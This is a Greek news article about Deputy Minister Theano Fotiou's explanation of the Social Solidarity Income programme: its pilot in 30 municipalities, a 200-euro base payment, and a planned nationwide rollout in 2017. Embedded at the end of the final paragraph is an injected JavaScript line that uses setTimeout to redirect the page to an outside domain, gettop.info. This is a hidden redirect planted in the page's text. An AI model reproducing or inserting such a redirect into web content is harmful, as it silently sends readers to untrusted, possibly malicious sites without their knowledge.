Διευκρινίσεις από τη Φωτίου για το Εισόδημα Αλληλεγγύης

0
7

 

Έως το τέλος του τρέχοντος μήνας θα λάβουν οι πρώτοι ωφελούμενοι του προγράμματος «Κοινωνικό Εισόδημα Αλληλεγγύης» (ΚΕΑ) το πρώτο επίδομα, που ξεκινά από τα 200 ευρώ και αυξάνεται ανάλογα με τον αριθμό των τέκνων ή το νοικοκυριό.

Πρόκειται για τους δικαιούχους της πρώτης πιλοτικής φάσης του προγράμματος σε 30 δήμους, όπως γνωστοποίησε μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM» η αναπληρώτρια υπουργός Κοινωνικής Αλληλεγγύης, Θεανώ Φωτίου.

Διευκρίνισε δε, ότι στόχος είναι την 1η Ιανουαρίου του 2017 το ΚΕΑ να εφαρμοστεί και στους 325 δήμους της Ελλάδας, ενώ έδωσε και το πλαίσιο των βασικών πυλώνων του προγράμματος.

Όπως εξήγησε η κ. Φωτίου, το μηνιαίο επίδομα είναι ο πρώτος πυλώνας του ΚΕΑ, με δεύτερο πυλώνα την πρόσβαση σε υπηρεσίες υγείας, μετακινήσεις, κοινωνικά ιατρεία κ.λπ. και τρίτο την πριμοδότηση όσων μπαίνουν στο πρόγραμμα για να ενταχθούν στην αγορά εργασίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here